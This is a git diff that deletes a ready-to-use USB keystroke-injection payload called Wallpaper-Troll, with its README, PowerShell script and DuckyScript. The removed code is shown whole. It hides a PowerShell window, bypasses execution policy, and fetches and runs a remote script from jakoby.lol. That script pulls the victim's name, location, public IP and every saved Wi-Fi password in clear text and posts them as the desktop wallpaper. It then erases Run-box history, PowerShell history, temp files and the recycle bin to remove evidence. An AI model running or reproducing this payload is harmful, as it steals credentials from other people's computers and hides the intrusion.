diff --git a/Payloads/Flip-Wallpaper-Troll/README.md b/Payloads/Flip-Wallpaper-Troll/README.md
deleted file mode 100644
index 0d21efa..0000000
--- a/Payloads/Flip-Wallpaper-Troll/README.md
+++ /dev/null
@@ -1,110 +0,0 @@
-
-
-
-
- Table of Contents
-
- - Description
- - Getting Started
- - Contributing
- - Version History
- - Contact
- - Acknowledgments
-
-
-
-# Wallpaper-Troll
-
-A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
-
-## Description
-
-This program enumerates a target PC to get their Name, GeoLocation (Latitude and Longitude), Public IP, Day password was last set, and wifi passwords. This information will be saved to a file that is then converted to a .BMP image. That image will be saved to their desktop and saved as their wallpaper. Opening the image on their desktop with NotePad will reveal the binary code with a hidden message at the bottom of the file.
-
-
-
-## Getting Started
-
-### Dependencies
-
-* Windows 10,11
-
-
(back to top)
-
-### Executing program
-
-* Plug in your device
-* Invoke-RestMethod will be entered in the Run Box to download and execute the script from memory
-```
-powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
-```
-
-(back to top)
-
-## Contributing
-
-All contributors names will be listed here
-
-I am Jakoby
-
-(back to top)
-
-## Version History
-
-* 0.1
- * Initial Release
-
-(back to top)
-
-
-## Contact
-
-📱 My Socials 📱
-
-
-
-
-(back to top)
-
-
-## Acknowledgments
-
-* [Hak5](https://hak5.org/)
-* [MG](https://github.com/OMG-MG)
-
-(back to top)
diff --git a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1
deleted file mode 100644
index 186e44d..0000000
--- a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1
+++ /dev/null
@@ -1,432 +0,0 @@
-############################################################################################################################################################
-# | ___ _ _ _ # ,d88b.d88b #
-# Title : Wallpaper-Troll | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
-# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
-# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
-# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
-# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
-# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
-# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
-# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
-# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
-#__________________________________|_________________________________________________________________________# | | ) ~ ( #
-# tiktok.com/@i_am_jakoby # / \ / ~ \ #
-# github.com/I-Am-Jakoby # \ / \~ ~/ #
-# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
-# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
-# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
-############################################################################################################################################################
-
-<#
-
-.DESCRIPTION
- This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
- Public IP, the SSID, and WiFi password of any current or previously connected to networks.
- It will take the gathered information and generate a .jpg with that information on show.
- Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned.
- Additionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop.
-#>
-#############################################################################################################################################
-
-# this is the message that will be coded into the image you use as the wallpaper
-
-$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
-
-# this will be the name of the image you use as the wallpaper
-
-$ImageName = "dont-be-suspicious"
-
-#############################################################################################################################################
-
-<#
-
-.NOTES
- This will get the name associated with the microsoft account
-#>
-
- function Get-Name {
-
- try {
-
- $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
-
- }
-
- # If no name is detected function will return $null to avoid sapi speak
-
- # Write Error is just for troubleshooting
- catch {Write-Error "No name was detected"
- return $env:UserName
- -ErrorAction SilentlyContinue
- }
-
- return $fullName
-
-}
-
-$fn = Get-Name
-
-echo "Hey" $fn >> $Env:temp\foo.txt
-
-echo "`nYour computer is not very secure" >> $Env:temp\foo.txt
-
-#############################################################################################################################################
-
-<#
-
-.NOTES
- This is to get the current Latitude and Longitude of your target
-#>
-
-function Get-GeoLocation{
- try {
- Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
- $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
- $GeoWatcher.Start() #Begin resolving current location
-
- while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
- Start-Sleep -Milliseconds 100 #Wait for discovery.
- }
-
- if ($GeoWatcher.Permission -eq 'Denied'){
- Write-Error 'Access Denied for Location Information'
- } else {
- $GL = $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.
- if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
- }
- }
- # Write Error is just for troubleshooting
- catch {Write-Error "No coordinates found"
- return "No Coordinates found"
- -ErrorAction SilentlyContinue
- }
-
-}
-
-Get-GeoLocation
-#if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
-
-
-#############################################################################################################################################
-
-<#
-
-.NOTES
- This will get the public IP from the target computer
-#>
-
-
-function Get-PubIP {
-
- try {
-
- $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
-
- }
-
- # If no Public IP is detected function will return $null to avoid sapi speak
-
- # Write Error is just for troubleshooting
- catch {Write-Error "No Public IP was detected"
- return $null
- -ErrorAction SilentlyContinue
- }
-
- return $computerPubIP
-}
-
-$PubIP = Get-PubIP
-if ($PubIP) { echo "`nYour Public IP: $PubIP" >> $Env:temp\foo.txt }
-
-
-###########################################################################################################
-
-<#
-
-.NOTES
- Password last Set
- This function will custom tailor a response based on how long it has been since they last changed their password
-#>
-
-
- function Get-Days_Set {
-
- #-----VARIABLES-----#
- # $pls (password last set) = the date/time their password was last changed
- # $days = the number of days since their password was last changed
-
- try {
-
- $pls = net user $env:USERNAME | Select-String -Pattern "Password last" ; $pls = [string]$pls
- $plsPOS = $pls.IndexOf("e")
- $pls = $pls.Substring($plsPOS+2).Trim()
- $pls = $pls -replace ".{3}$"
- $time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
- $DateArray =$time.Split(".")
- $days = [int]$DateArray[0]
- return $pls
-
- }
-
- # If no password set date is detected function will return $null to cancel Sapi Speak
-
- # Write Error is just for troubleshooting
- catch {Write-Error "Day password set not found"
- return $null
- -ErrorAction SilentlyContinue
- }
-}
-
-$pls = Get-Days_Set
-if ($pls) { echo "`nPassword Last Set: $pls" >> $Env:temp\foo.txt }
-
-
-###########################################################################################################
-
-<#
-
-.NOTES
- All Wifi Networks and Passwords
- This function will gather all current Networks and Passwords saved on the target computer
- They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
-#>
-
-
-# Get Network Interfaces
-$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
-
-# Get Wifi SSIDs and Passwords
-$WLANProfileNames =@()
-
-#Get all the WLAN profile names
-$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
-
-#Trim the output to receive only the name
-Foreach($WLANProfileName in $Output){
- $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
-}
-$WLANProfileObjects =@()
-
-#Bind the WLAN profile names and also the password to a custom object
-Foreach($WLANProfileName in $WLANProfileNames){
-
- #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
- try{
- $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
- }Catch{
- $WLANProfilePassword = "The password is not stored in this profile"
- }
-
- #Build the object and add this to an array
- $WLANProfileObject = New-Object PSCustomobject
- $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
- $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
- $WLANProfileObjects += $WLANProfileObject
- Remove-Variable WLANProfileObject
-}
- if (!$WLANProfileObjects) { Write-Host "variable is null"
- }else {
-
- # This is the name of the file the networks and passwords are saved to and later uploaded to the DropBox Cloud Storage
-
- echo "`nW-Lan profiles: ===============================" $WLANProfileObjects >> $Env:temp\foo.txt
-
-$content = [IO.File]::ReadAllText("$Env:temp\foo.txt")
- }
-#############################################################################################################################################
-
-<#
-
-.NOTES
- This will get the dimension of the targets screen to make the wallpaper
-#>
-
-Add-Type @"
-using System;
-using System.Runtime.InteropServices;
-public class PInvoke {
- [DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
- [DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
-}
-"@
-$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
-$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
-$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
-
-#############################################################################################################################################
-
-<#
-
-.NOTES
- This will get take the information gathered and format it into a .jpg
-#>
-
-Add-Type -AssemblyName System.Drawing
-
-$filename = "$env:tmp\foo.jpg"
-$bmp = new-object System.Drawing.Bitmap $w,$h
-$font = new-object System.Drawing.Font Consolas,18
-$brushBg = [System.Drawing.Brushes]::White
-$brushFg = [System.Drawing.Brushes]::Black
-$graphics = [System.Drawing.Graphics]::FromImage($bmp)
-$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
-$graphics.DrawString($content,$font,$brushFg,500,100)
-$graphics.Dispose()
-$bmp.Save($filename)
-
-# Invoke-Item $filename
-
-#############################################################################################################################################
-
-<#
-
-.NOTES
- This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
- Then it will clean up the files you don't want to leave behind
-#>
-
-echo $hiddenMessage > $Env:temp\foo.txt
-cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
-
-rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
-
-
-#############################################################################################################################################
-
-<#
-
-.NOTES
- This will take the image you generated and set it as the targets wall paper
-#>
-
-Function Set-WallPaper {
-
-<#
-
- .SYNOPSIS
- Applies a specified wallpaper to the current user's desktop
-
- .PARAMETER Image
- Provide the exact path to the image
-
- .PARAMETER Style
- Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
-
- .EXAMPLE
- Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
- Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
-
-#>
-
-
-param (
- [parameter(Mandatory=$True)]
- # Provide path to image
- [string]$Image,
- # Provide wallpaper style that you would like applied
- [parameter(Mandatory=$False)]
- [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
- [string]$Style
-)
-
-$WallpaperStyle = Switch ($Style) {
-
- "Fill" {"10"}
- "Fit" {"6"}
- "Stretch" {"2"}
- "Tile" {"0"}
- "Center" {"0"}
- "Span" {"22"}
-
-}
-
-If($Style -eq "Tile") {
-
- New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
- New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
-
-}
-Else {
-
- New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
- New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
-
-}
-
-Add-Type -TypeDefinition @"
-using System;
-using System.Runtime.InteropServices;
-
-public class Params
-{
- [DllImport("User32.dll",CharSet=CharSet.Unicode)]
- public static extern int SystemParametersInfo (Int32 uAction,
- Int32 uParam,
- String lpvParam,
- Int32 fuWinIni);
-}
-"@
-
- $SPI_SETDESKWALLPAPER = 0x0014
- $UpdateIniFile = 0x01
- $SendChangeEvent = 0x02
-
- $fWinIni = $UpdateIniFile -bor $SendChangeEvent
-
- $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
-}
-
-#----------------------------------------------------------------------------------------------------
-
-function clean-exfil {
-
-<#
-
-.NOTES
- This is to clean up behind you and remove any evidence to prove you were there
-#>
-
-# Delete contents of Temp folder
-
-rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
-
-# Delete run box history
-
-reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
-
-# Delete powershell history
-
-Remove-Item (Get-PSreadlineOption).HistorySavePath
-
-# Deletes contents of recycle bin
-
-Clear-RecycleBin -Force -ErrorAction SilentlyContinue
-
-}
-
-#----------------------------------------------------------------------------------------------------
-
-function Target-Comes {
-Add-Type -AssemblyName System.Windows.Forms
-$originalPOS = [System.Windows.Forms.Cursor]::Position.X
-$o=New-Object -ComObject WScript.Shell
-
- while (1) {
- $pauseTime = 3
- if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
- break
- }
- else {
- $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
- }
- }
-}
-
-#----------------------------------------------------------------------------------------------------
-
-Target-Comes
-
-Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
-
-clean-exfil
-
diff --git a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.txt b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.txt
deleted file mode 100644
index 681db45..0000000
--- a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.txt
+++ /dev/null
@@ -1,20 +0,0 @@
-REM Title: Wallpaper-Troll
-REM
-REM Author: I am Jakoby
-REM
-REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details.
-REM
-REM Target: Windows 10, 11
-REM
-REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload.
-REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
-REM
-REM --------------------------------------------------------------------------------------
-REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
-REM --------------------------------------------------------------------------------------
-REM
-GUI r
-DELAY 500
-STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
-DELAY 500
-ENTER
diff --git a/Payloads/Flip-Wallpaper-Troll/wp-troll.jpg b/Payloads/Flip-Wallpaper-Troll/wp-troll.jpg
deleted file mode 100644
index f6263bc..0000000
Binary files a/Payloads/Flip-Wallpaper-Troll/wp-troll.jpg and /dev/null differ